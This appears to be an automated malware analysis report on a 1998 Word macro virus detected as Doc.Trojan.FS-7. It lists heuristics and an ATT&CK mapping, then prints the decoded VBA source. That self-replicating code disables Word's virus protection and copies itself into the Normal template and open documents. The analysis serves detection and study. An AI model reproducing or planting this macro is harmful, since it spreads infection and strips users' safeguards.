MALICIOUS
Risk Score: 80
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document containing VBA macros. The macros appear to modify the Normal.dot template and disable virus protection, suggesting an attempt to establish persistence or evade security measures. The copyright notice 'Copyright (C) 1998 by FlyShadow ~^^~' is present in the macro code.
Heuristics 2
- ClamAV: Doc.Trojan.FS-7 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.FS-7
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 816 bytes |

SHA-256: 7f1bb67779763d3348f27db82dbcc9aa71480eb7ead9be908c37e71b25fc641a

Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'Copyright (C) 1998 by FlyShadow ~^^~ - Semis
Private Sub Document_Close(): On Error Resume Next
Options.VirusProtection = &H0: Options.SaveNormalPrompt = &H0
Set ι = ThisDocument.VBProject.VBComponents(1).CodeModule: ν = ι.Lines(1, 1)
With ActiveDocument.VBProject.VBComponents(1).CodeModule
If ν <> .Lines(1, 1) Then .DeleteLines 1, .CountOfLines: .AddFromString ι.Lines(1, 11)
End With
With NormalTemplate.VBProject.VBComponents(1).CodeModule
If ν <> .Lines(1, 1) Then .DeleteLines 1, .CountOfLines: .AddFromString ι.Lines(1, 11)
End With
End Sub
```